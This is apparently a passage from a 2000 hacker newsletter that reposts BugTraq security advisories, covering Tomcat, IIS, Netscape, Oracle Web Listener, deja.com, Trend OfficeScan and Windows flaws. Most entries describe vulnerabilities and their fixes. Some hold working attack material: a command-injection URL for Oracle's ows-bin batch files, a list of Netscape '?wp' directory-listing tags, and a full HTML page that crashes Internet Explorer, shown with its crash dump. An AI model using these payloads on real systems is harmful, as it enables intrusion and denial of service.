gpm-root is a beautiful tool shipped in the gpm package. It pops up
beautiful menus based on each user's own config file when
Ctrl+Mousebutton is pressed on the console.
When the user selects one of his/her favourite utility from his/her
own list, gpm-root starts this process with the group and
supplementary groups of the gpm-root daemon.
gpm-root calls setuid() first and setgid() afterwards, hence the later
one is unsuccessful. The authors completely forgot about calling
initgroups().
Egmont Koblinger
@HWA
93.0 HNS:Esafe Protect Gateway (CVP) problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 22, 2000
The Esafe Protect Gateway (ESPG) does not scan some files in
combination with FireWall-1 and CVP ...
Esafe Protect Gateway (CVP) problems
Posted to BugTraq on March 22, 2000
After notification of the manufacturer here is the full report on
aproblem noted with Esafe Protect Gateway.
SUMMARY
-------
The Esafe Protect Gateway (ESPG) does not scan some files in
combination with FireWall-1 and CVP.
DETAILS
-------
If you want the Esafe Protect Gateway to scan all content for the
presence of a virus you have two options.
1. Choose to scan anything not listed in the 'safe file types' list. And
then clear out all entries in that list.
2. Choose to scan only files listed in the 'dangerous file types' list.
And then have only one extension listed namely '*'.
Deciding to rely on extensions seems an indication of a flawed
designallready. Renaming files is a common practice and can be
done by anyone capable of operating a keyboard.
The problem is that anything with the MIME type set to TEXT/HTML
will not be scanned regardless of the options recommended above.
A simple test was capable of pointing this out.
Setup a default Apache server. Copy a virusfile to two location
beinghttp://website/test1.txt and http://website/test1.html and try to
download them with your favorite browser. The URL is unique and
was never used by your browser to minimize the possibilities of
caches being in place. But forced reloads work properly and are
sufficiant if you want to replicate this issue.
Downloading http://website/test1.html dows nothing to detect the
virus and it is yours. No protection is offered.
Downloadinghttp://website/test1.txt will not work as ESPG will now
intercept the file contain the virus.
By adjusting the webserver to send out *.txt as MIME type
TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test
with http://website/test2.txt and http://website/test2.html to verify
things. Downloading http://website/test2.txt will get you infected as
ESPG will not scan the file. And downloading
http://website/test2.html will not work as ESPG detects the virus
and will prevent it from downloading.
CONCLUSION
----------
Esafe Protect Gateway can at present not be trusted to protect you
from downloading a virus.
VERSIONS
--------
Esafe Protect Gateway v2.1 build 98.
Virus tables dated March 15, 2000.
STATUS
------
Manufacturer notified.
No fix available.
Results have not been confirmed yet.
However I was able to verify that the problem lies with Esafe and not
with Check Point by using Trend Micro's CVP server instead which
did not suffer from the same problem.
Hugo.
@HWA
94.0 HNS:Bug in Apache project: Jakarta Tomcat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 22, 2000
The Apache project: Jakarta Tomcat contains a serius security bug.
Tomcat is used together with the Apache web server to serve Java
Server Pages and Java servlets. ...
Bug in Apache project: Jakarta Tomcat
Posted to BugTraq on March 22, 2000
The Apache project: Jakarta Tomcat contains a serius security
bug.Tomcat is used together with the Apache web server to serve
Java Server Pages and Java servlets.
Summary from the Tomcat development team advisory is posted
below:Advisory:
Delivered with Tomcat is an example (jsp/source.jsp) that can be
used to deliver the contents of any file on your machine.
Recommended action:
The simplest course of action is to simply remove this example from
your machine. Alternatively, you can replace the associated
ShowSource.class file with one from the current 3.1 beta.
Fixes:
Fixes have been made to the core of Tomcat to not allow any file
references to be resolved outside of the context being used for the
resolution.Additionally, a change has been made to
ShowSource.java to disallow any requests which contain the string
"..".
The 3.1 beta 1 release has been refreshed with these fixes applied.
Med venlig hilsen/Best regards/Freundliche Gr��e
Jan Madsen
S e c u r i t y w o r k e r s
@HWA
95.0 HNS:MS SECURITY BULLETIN #18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 21, 2000
Microsoft has released a patch that eliminates a securityvulnerability
in Microsoft Internet Information Server 4.0. The vulnerability could
allow a malicious user to consume all resources on a web server
and prevent it from servicing other users.< ...
MS SECURITY BULLETIN #18
Posted to BugTraq on March 21, 2000
Microsoft Security Bulletin (MS00-018)
- --------------------------------------
Patch Available for "Chunked Encoding Post" Vulnerability
Originally Posted: March 20, 2000
Summary
=======
Microsoft has released a patch that eliminates a securityvulnerability
in Microsoft(r) Internet Information Server 4.0. Thevulnerability could
allow a malicious user to consume all resources ona web server and
prevent it from servicing other users.
Frequently asked questions regarding this vulnerability can be
foundat
http://www.microsoft.com/technet/security/bulletin/fq00-018.asp.
Issue
=====
IIS 4.0 supports chunked encoding transfers, but does not limit
thesize of the buffer that can be reserved. This would allow a
malicioususer to request an extremely large buffer for a POST or
PUT operation,but never actually send data, thereby blocking
memory on the serverthat had been allocated to the session. If
sufficient memory on theserver were blocked in this fashion, it could
prevent the server fromperforming useful work. There is no capability
through this attack tocreate, modify or delete data on the server, nor
is there anycapability to usurp administrative control of the server. If
themalicious user closed his session, the memory would be released
andthe server's operation would return to normal. Otherwise, the
machinecould be put back into normal service by stopping and
restarting theservice.
Affected Software Versions
==========================
- Microsoft Internet Information Server 4.0
Patch Availability
================== - X86:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761
- Alpha:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762
NOTE: Additional security patches are available at the
MicrosoftDownload Center
@HWA
96.0 HNS:S.A.F.E.R. Security Bulletin 000317
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 20, 2000
Problem exists in Netscape Enterprise Server that can allow remote
user to obtain list of directories and subdirectories on the server ...
S.A.F.E.R. Security Bulletin 000317
Posted to BugTraq on March 20, 2000
S.A.F.E.R. Security Bulletin 000317.EXP.1.5
______________________________________________
TITLE :
Netscape Enterprise Server and '?wp' tags
DATE :
March 17, 2000
NATURE :
Remote user can obtain list of directories on Netscape Enterprise
Server
AFFECTED :
Netscape Enterprise Server 3.x
PROBLEM:
Problem exists in Netscape Enterprise Server that can allow remote
user to obtain list of directories and subdirectories on the server.
DETAILS:
Netscape Enterprise Server with 'Web Publishing' enabled can be
tricked into displaying the list of directories and subdirectories, if
usersupplies certain 'tags'. For example:
http://home.netscape.com/?wp-cs-dump
will reveal the contents of the root directory on that web
server.Contents of subdirectories can be obtained as well. Other
tags that can be used are:
?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout
FIXES:
Disable 'Web Publishing'. It is safe to assume that 'Web Publishing'
is not the only feature that will 'activate' this problem. We have
foundfew servers running Netscape Enterprise Server that did not
have 'WebPublishing' enabled, but were still vulnerable to this
problem. UntilNetscape makes an official response and clarify what
is the cause ofthis problem, it is advised that you test your server
against thisvulnerability, and if you are vulnerable, try to disable
certainfeatures and services.
Netscape has been contacted on many occasions, but has failed
torespond.
S.A.F.E.R. - Security Alert For Entreprise Resources
Copyright (c) 2000 The Relay Group
@HWA
97.0 HNS:Decon fix for con/con is vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 18, 2000
If you had con problem and installed Decon fix, you are now
vulnerable to another win 95(possibly)/98(tested) crash which is
worse than the previous. ...
Decon fix for con/con is vulnerable
Posted to BugTraq on March 18, 2000
If you had con problem and installed Decon fix, you are now
vulnerableto another win 95(possibly)/98(tested) crash which is
worse than the previous.
Software affected : All versions of Microsoft Internet Explorer
(Itdoesn't work in Netscape Navigator)
Actual problem :Type existing server in address box, and then
request for nonexistent file with name >300 symbols. After server
sends reply to the browseryour system stops responding at all,
Control+Alt+Del work but youwon't see the box with tasks running
so only thing you can do isREBOOT.
Somebody can deface some good website and create a redirectwith
0 seconds waiting to such link.
Example :
http://www.amsouth.com/(lot of aaaa's).html
Fix : Delete Decon fix from startup folder :) Now you are vulnerableto
con/con.
Hello to Cre@tor
Speedo
mailto:Tima@au.ru
@HWA
98.0 HNS:Cerberus Information Security Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 17, 2000
The Cerberus Security Team has discovered a number of issues
with Oracle's Web Listener, part of the Oracle Application Server,
that can allow a remote attacker to run arbitrary commands on the
web server ...
Cerberus Information Security Advisory
Posted to BugTraq on March 17, 2000
Released : 15th March 2000
Name : Oracle
Affected Systems : Oracle Web Listener 4.0.x on Windows NT
Issue : Attackers can run arbitrary commands on the webserver
Description
***********
The Cerberus Security Team has discovered a number of issues
with Oracle's Web Listener, part of the Oracle Application Server,
that can allow aremote attacker to run arbitrary commands on the
web server
Details
*******
Part of the problem is caused by default settings after OAS has
beeninstalled. The "ows-bin" virtual directory on an Oracle Web
Listener is the equivalent of the "cgi-bin" on other web servers and
by default this is set toC:\orant\ows\4.0\bin - this directory not only
contains a number of batch files, DLLs andexecutables but also the
binary image file for the Listener itself. Even if this default setting
has been changed however you may still be at risk if you have batch
files in the new "ows-bin" directory.
Arbitrary Command Execution
***************************
The Oracle Web Listener will execute batch files as CGI scripts and
bymaking a request to a batch file that requires one or more
arguments it is possible to execute any command the attacker
wants by building a special query string.
For example the following will give a directory listing:
http://charon/ows-bin/perlidlc.bat?&dir
It is even possible to use UNC paths so the Listener will connect to
the remote machine over NBSession, download the executable and
then execute it.
By default the Web Listener process runs in security context of
SYSTEM so anycommands issued by an attacker will run with
SYSTEM privileges.
Another problem is that the Listener will expand the "*" character so
even if the attacker doesn't know the name of a real batch file in the
"ows-bin"they can request *.bat?&command
Executables
***********
Some of the executables in the default directory allow attackers to
kill services, return configuration information and cause other
undesirable events tooccur.
Solution:
*********
Due to the severity of this problem Cerberus recommends that the
following be actioned immediately.
If "ows-bin" is the default then using the Oracle Application Server
Manager remove the ows-bin virtual directory or point it to a more
benign directory. If "ows-bin" is not the default then verfiy that there
are no batch files in thisdirectory. A check for this has been added
to Cerberus' security scanner, CIS available from their website.
About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists
inpenetration testing and other security auditing services. They are
thedevelopers of CIS (Cerberus' Internet security scanner) available
for free from their website: http://www.cerberus-infosec.co.uk
To ensure that the Cerberus Security Team remains one of the
strongestsecurity audit teams available globally they continually
research operating system and popular service software
vulnerabilites leading to the discovery of "world first" issues. This not
only keeps the team sharp but also helps the industry and vendors
as a whole ultimately protecting the end consumer. As testimony to
their ability and expertise one just has to look at exactly how many
major vulnerabilities have been discovered by the Cerberus Security
Team - over 40 to date, making them a clear leader of companies
offering such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus
Information Security, Ltd are located in London, UK but serves
customers across the World. For more information about Cerberus
Information Security, Ltd please visit their website or call on +44(0)
181 661 7405
Permission is hereby granted to copy or redistribute this advisory
but onlyin its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
@HWA
99.0 HNS:Malicious-HTML vulnerabilities at deja.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 17, 2000
Deja.com does not always escape meta-characters when displaying
Usenet articles. This allows an attacker to include arbitrary tags in
the HTML sentto people reading the attackers article at deja.com.<
...
Malicious-HTML vulnerabilities at deja.com
Posted to BugTraq on March 17, 2000
Niall Smart, niall@pobox.com
Synopsis
========
deja.com does not always escape meta-characters when
displayingUsenet articles. Specifically, the article view
page(http://www.deja.com/getdoc.xp) and the thread view
page(http://www.deja.com/viewthread.xp) display the subject of
thearticle "as is" between title tags.
This allows an attacker to include arbitrary tags in the HTML sentto
people reading the attackers article at deja.com.
There are probably a large number of sites out there with this typeof
vulnerability, the deja.com example is interesting because it'sa busy
site with a large amount of relatively users who naivelytrust it.
Exploit
=======
An attacker can embed any tag in the head or body of the HTML
page.This allows numerous attacks including:
Cross Site Scripting:
An attacker can post an article with a link to a script on
anotherserver and call that script from the onLoad event handler.
Site Spoofing:
An attacker can use a meta tag to automatically redirect theuser to
a spoofed version of deja.com.
See the CERT advisory referenced below for more information on
thistype of attack.
Examples
========
NOTE: The following examples are intended to be harmless,
however I take no responsibility for any damage caused by following
these links.
JavaScript popup:
http://www.deja.com/getdoc.xp?AN=591804116
Redirection using meta tag:
http://www.deja.com/getdoc.xp?AN=591833344
Notes
=====
I haven't thoroughly tested deja.com's pages, there may be
otherinstances of this error. It would be particularly interesting tofind
one that didn't require the attacker to include the HTML inthe subject
field of the article.
This example illustrates how *not* to approach
meta-characterescaping. If you call a function to escape
meta-characters eachtime the data is inserted into the web page, as
deja.com appear todo, you run the risk of occasionally forgetting to
do it. deja.comescape correctly in two other places on the article
view page butforget once. Instead you should escape them earlier in
the dataflow, perhaps just after getting the data from the database,
therebyprecluding the human-error factor.
References
==========
CA-2000-02 Malicious HTML Tags Embedded in Client Web
Requests
http://www.cert.org/advisories/CA-2000-02.html
HTML 3.2 Character Entities
http://www.w3.org/TR/REC-html32.html#latin1
@HWA
100.0 HNS:Certificate Validation Error in Netscape Browsers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 17, 2000
The problem is that there is an inherited trust between an
expiredcertificate and an active certificate, where there really
shouldn't be. If any trust should be there, it certainly shouldn't be
with an expired certificate. ...
Certificate Validation Error in Netscape Browsers
Posted to BugTraq on March 17, 2000
This may not be a normal "BugTraq" issue, since it is more a flaw in
trust in a security design then it is an actual bug in
software...butnone-the-less I think it is something that should be
discussed. I haven't checked this with Microsoft IE, I just noticed it
as being a flaw inNetscape (submitted a bug report to them earlier
but they are eitherreally busy or have chosen to ignore the report.)
Tested in browsers from 4.07 - 4.72, all which operated in the same
fashion.
What is the issue?
The scenario is that a user accesses a website for which they do
notcurrently have trust for the signer of the certificate. They are
asked whether they would like to trust the server certificate (until
itexpires,) which if they respond yes, the web site signer certificate
will be stored in the certificate database. You can check on
thesecertificates by clicking on the Security Icon on the browser,
then select the Website item from the menu. Once stored in the
database, any future access to this site is permitted without
warning. The error occurs when the web site certificate is expired
and the new site certificate is valid, Netscape never checks to see if
the certificate is expired and replaced with a new certificate, and
thus the user can continue to access the site without a warning
stating that the certificate is expired and that a new certificate exists
for the site (it apparently only checks to see if the new certificate
isn't expired.) Manually verifying the old certificate in the database
will prove that the certificate is invalid. When the site is properly
reissued a certificate, Netscape automatically trusts the
newcertificate based on the previous certificate...if the
previouscertificate is removed from the database and the website is
re-accessed, the standard warning appears asking the user if they
wish to trust thecertificate. Since the new certificate is
cryptographically differentfrom the old certificate, no trust
relationship should exist (only thesigner is the same.)
Netscape does not replace the old expired certificate with the
newcertificate, and does not add the new certificate to the database.
Nor does it tell the user that the new certificate a site is sending
does not match a previous certificate.
Why is this a problem?
The problem is that there is an inherited trust between an
expiredcertificate and an active certificate, where there really
shouldn't be. If any trust should be there, it certainly shouldn't be
with an expired certificate. The idea here is that Netscape should
complain about a site which has a certificate different than what
Netscape has in its database. When you accept a certificate from a
website which you do not already hold a trust with the signer of the
certificate, you should be warned if that certificate is no longer valid
or when the server has been issued a new one. You are trusting that
certificate and its signer, not that site. If the site's certificate
changes, you should be warned about the change and asked if you
still want to trust the site. If a hacker manages to gain access to the
key and the certificate, and changes the key and thecertificate, a
warning may be the only thing to protect you from thathacker
becoming a man in the middle to the attack.
What should be the solution?
An option, in the browser, to allow the user to be warned the first
time a certificate changes on a webserver. If the previous certificate
isexpired, and the current certificate on a site is different, the
usershould be warned of the change, and asked whether they wish
the newcertificate to replace the previous one. That way, paranoid
users like myself can be warned when a certificate changes, so that
we can decidewhether the new certificate should be trusted. Of
course, if I already trust the certificate signer, then I shouldn't be
prompted about thecertificate.
@HWA
101.0 HNS:"OfficeScan DoS & Message Replay" Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 17, 2000
Trend Micro has released a new version of OfficeScan Corporate
Edition - version 3.51 - that eliminates two security vulnerabilities
found on previous versions ...
OfficeScan DoS & Message Replay" Vulnerability
Posted to BugTraq on March 17, 2000
Summary
=======
Trend Micro has released a new version of OfficeScan Corporate
Edition - version 3.51 - that eliminates two security vulnerabilities
found onprevious versions. Previous versions of OfficeScan allow
intruders within a firewall to initiate a DoS attack on the OfficeScan
client (tmlisten.exe) as well as to capture OfficeScan commands.
These commands can be replayed and used to change other
OfficeScan client configurations.
Issues
======
Trend OfficeScan version 3.5 or earlier versions perform incomplete
parsing and buffer overflow checking in its Windows NT client. If a
malicious user, has the ability to telnet and submit some form of
message to the OfficeScan NT client, OfficeScan service consumes
100% CPU processing power. Inaddition, communication between
the OfficeScan server and client wasestablished with insufficient
encryption and authentication, which allows a malicious user to sniff
and replay OfficeScan commands.
Implementation
==============
Trend Micro has corrected the DoS attack issue by correctly parsing
and handling commands or arbitrary messages sent to the
OfficeScan client.
Trend Micro has implemented MD5 Message-Digest Algorithm to
ensure that the commands between the server and the clients can
not be decrypted or captured to be replayed to other clients. For
details about the MD5 encryptionalgorithm see:
http://theory.lcs.mit.edu/~rivest/rfc1321.txt
Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.5
Trend OfficeScan for Microsoft SBS 4.5
Patch Availability
==================
- http://www.antivirus.com/download/ofce_patch.htm
More Information
============
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_35.htm
- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8
Obtaining Support on this Issue
===============================
This is a fully supported release. Information on contacting Trend
Micro Technical Support is available at
http://www.trend.com/support/default.htm
@HWA
102.0 HNS:MS Security bulletin#17
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 17, 2000
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
Windows 98 Second Edition. The vulnerability could cause a user's
system to crash, if they attempted to access a file or folder whose
path contained certain reserved words. ...
MS Security bulletin#17
Posted to BugTraq on March 17, 2000
Microsoft Security Bulletin (MS00-017)
--------------------------------------
Patch Available for "DOS Device in Path Name" Vulnerability
Originally Posted: March 16, 2000
Summary
=======
Microsoft has released a patch that eliminates a security
vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and
Windows 98 Second Edition. The vulnerability could cause a user's
system to crash, if they attempted to access a file or folder whose
path contained certain reserved words.
Frequently asked questions regarding this vulnerability can be
foundat
http://www.microsoft.com/technet/security/bulletin/fq00-017.asp.
Issue
=====
DOS device names are reserved words, and cannot be used as
folder or file names. When parsing a reference to a file or folder,
Windows correctly checks for the case in which a single DOS
device name is used in the path, and treats it as invalid. However, it
does not check for the case in which the path includes multiple
DOS device names. When Windows attempts to interpret the device
name as a file resource, it performs an illegal resource access that
usually results in a crash.
Because it is not possible to create files or folders that contain
DOSdevice names, it would be unusual for a user to try to access
one under normal circumstances. The chief threat posed by this
vulnerability is that a malicious user could attempt to entice a user
to attempt such an access. For instance, if a web site operator
hosted a hyperlink that referenced such a path, clicking the link
would result in the user's machine crashing.Likewise, a web page or
HTML mail that specified a local file as the source of rendering
information could cause the user's machine to crash when it was
displayed. If this happened, the machine could be put back into
normalservice by restarting it.
Affected Software Versions
==========================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition
Patch Availability
==================
- Windows 95:
http://www.microsoft.com/downloads/release.asp?releaseID=19491
- Windows 98 and Windows 98 Second Edition:
http://www.microsoft.com/downloads/release.asp?ReleaseID=19389
NOTE: Additional security patches are available at the Microsoft
Download Center
NOTE:
The patch will be available shortly at the WindowsUpdate site. When
this happens, we will modify the bulletin to provide additional
information.
More Information
================
Please see the following references for more information related to
this issue.
- Microsoft Security Bulletin MS00-017: Frequently Asked
Questions,
http://www.microsoft.com/technet/security/bulletin/fq00-017.asp
- Microsoft Knowledge Base article Q256015 discusses this issue
and will be available soon.
- Microsoft TechNet Security web site,
http://www.microsoft.com/technet/security/default.asp.
Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting
MicrosoftTechnical Support is available at
http://support.microsoft.com/support/contact/default.asp
Revisions
=========
- March 16, 2000: Bulletin Created.
@HWA
103.0 HNS:Georgi Guninski security advisory #9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
Posted @ March 15, 2000
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
(probablyothers) which allows executing arbitrary programs using
.eml files.This may be exploited when browsing web pages or
openining an email message in Outlook. ...
Georgi Guninski security advisory #9
Posted to BugTraq on March 15, 2000
IE and Outlook 5.x allow executing arbitrary programs using .eml
files
Disclaimer:
The opinions expressed in this advisory and program are my own
and notof any company.The usual standard disclaimer applies,
especially the fact that GeorgiGuninski is not liable for any damages
caused by direct or indirect useof the information or functionality
provided by this program.Georgi Guninski, bears NO responsibility
for content or misuse of thisprogram or any derivatives thereof.
Description:
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT
(probablyothers) which allows executing arbitrary programs using
.eml files.This may be exploited when browsing web pages or
openining an emailmessage in Outlook.This may lead to taking
control over user's computer.It is also possible to read and send
local files.
Details:
The problem is creating files in the TEMP directory with known
name andarbitrary content.One may place a .chm file in the TEMP
directory which contains the"shortcut" command and when the .chm
file is opened with the showHelp()method programs may be
executed.
This vulnerability may be exploited by HTML email message in
Outlook.
Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html
(Note: George seems to have pulled the script, it gives a 404
now .. - Ed/Cruci)
Workaround: Disable Active Scripting.
Copyright 2000 Georgi Guninski
103.1 PSS:More MSIE crashing info by NtWakO
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Packet Storm Security
http://packetstorm,securify.com/
--[Tuesday, March 21, 2000 by NtWaK0 /
biteraser]------------------------------
--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY*
Object]---
--[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too
?]-------
Here is the story, while having a chat (IRC) with biteraser today heh, he
suddenly said *fu*k* hrm... I said what is wrong
He said I JUST CRASHED IE..
After some investigation it turned about to be the *HISTORY* Object :).
So if you cut and past the html code in a file, then open it with IE, you
will
be able to see the crash.
Note: key line is: <HS:HISTORY ID="HS">, without it IEt won't crash and
behavior
should be #default. It can be exploited more.
--[SNIP]--------------------------------------------------------------------
---
<HTML>
<HEAD>
<Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
</HEAD>
<BODY>
<xml:namespace ns='CallFixPage' prefix='HS'>
<STYLE>
@media all{HS\:HISTORY {behavior:url(#default);}}
</STYLE>
<!--XML code -->
<HS:HISTORY ID="HS" />
<!-- End XML code -->
</BODY>
</HTML>
--[SNIP]--------------------------------------------------------------------
---
NOTE: Crash Memory dump.
Application exception occurred:
App: exe\iexplore.dbg (pid=219)
When: 3/21/2000 @ 12:52:24.60
Exception number: c0000005 (access violation)
*----> System Information <----*
Computer Name: INFOSEC-BRAIN
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 6 Stepping 10
Windows Version: 4.0
Current Build: 1381
Service Pack: 6
Current Type: Uniprocessor Free
Registered Organization: NtWaK0
Registered Owner: NtWaK0
(00400000 - 00412000) exe\iexplore.dbg
(77f60000 - 77fbe000) dll\ntdll.dbg
(77f00000 - 77f5e000) dll\kernel32.dbg
(77e70000 - 77ec5000) dll\user32.dbg
(77ed0000 - 77efc000) dll\gdi32.dbg
(77dc0000 - 77dff000) dll\advapi32.dbg
(77e10000 - 77e67000) dll\rpcrt4.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(71500000 - 71610000) SHDOCVW.dbg
(00760000 - 007e9000) COMCTL32.dbg
(77c40000 - 77d7b000) dll\shell32.dbg
(71740000 - 71740000)
(22000000 - 22000000)
(77b20000 - 77bd7000) dll\ole32.dbg
(71050000 - 71118000) BROWSEUI.dbg
(717b0000 - 717b0000)
(779b0000 - 779b9000) dll\linkinfo.dbg
(77720000 - 77731000) dll\mpr.dbg
(77a40000 - 77a4d000) dll\ntshrui.dbg
(78000000 - 78040000)
(77800000 - 7783a000) dll\netapi32.dbg
(77840000 - 77849000) dll\NetRap.dbg
(777e0000 - 777ed000) dll\samlib.dbg
(65340000 - 653d2000) oleaut32.dbg
(70290000 - 702fe000) URLMON.dbg
(77a90000 - 77a9b000) dll\version.dbg
(779c0000 - 779c8000) dll\lz32.dbg
(77bf0000 - 77bf7000) dll\rpcltc1.dbg
(70410000 - 70492000) MLANG.dbg
(70000000 - 70242000) MSHTML.dbg
(01700000 - 01772000) WININET.dbg
(48080000 - 48080000)
(76ab0000 - 76ab5000) dll\imm32.dbg
(70f00000 - 70f1a000) dll\iepeers.dbg
State Dump for Thread Id 0xd2
eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000
edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202
function: Ordinal158
70bd180d 8b542408 mov edx,[esp+0x8]
ss:0129808f=????????
70bd1811 56 push esi
70bd1812 8b742408 mov esi,[esp+0x8]
ss:0129808f=????????
FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi]
ds:00000000=????
70bd1819 46 inc esi
70bd181a 46 inc esi
70bd181b 83f841 cmp eax,0x41
70bd181e 7c05 jl Ordinal158+0x18 (70bd1825)
70bd1820 83f85a cmp eax,0x5a
70bd1823 7e1d jle Ordinal158+0x35 (70bd1842)
70bd1825 0fb70a movzx ecx,word ptr [edx]
ds:70f01ef4=0043
70bd1828 42 inc edx
70bd1829 42 inc edx
70bd182a 83f941 cmp ecx,0x41
70bd182d 7c05 jl Ordinal158+0x27 (70bd1834)
*----> Stack Back Trace <----*
FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60
MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8
MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000
MSHTML!MatchExactGetIDsOfNames
*----> Raw Stack Dump <----*
00069688 0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70
...pWm.p.......p
00069698 68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00
h.......@.......
000696a8 78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00
x..p..}.........
000696b8 38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00
8Y,.@.....}.....
000696c8 00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01
...........p..}.
000696d8 00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00
....4Z,.8Y,.@...
000696e8 40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00
@....Y,..@......
000696f8 8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01
...p....4Z,.8Y,.
00069708 40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00
@...0Y,.0Y,.`...
00069718 44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01
D......p....8Y,.
00069728 40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00
@...0Y,..Y,.....
00069738 10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00 .4,..
.p....`...
00069748 5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00
0 ]~.p.....Y,.|...
00069758 7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00
|.........\.C.r.
00069768 61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00
a.s.h._.A.L.L._.
00069778 49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00
I.E.4._.I.E.5._.
00069788 6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00
o.n._.W.i.n.d.o.
00069798 77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00
w.s._.9.x._.a.n.
000697a8 64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00
d._.A.l.l._.N.T.
000697b8 5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00
_.S.P.x._.w.i.t.
State Dump for Thread Id 0xc6
eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30
edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000206
function: ZwReplyWaitReceivePort
77f67f9c b890000000 mov eax,0x90
77f67fa1 8d542404 lea edx,[esp+0x4]
ss:01a7e7f7=????????
77f67fa5 cd2e int 2e
77f67fa7 c21000 ret 0x10
77f67faa 8bc0 mov eax,eax
*----> Stack Back Trace <----*
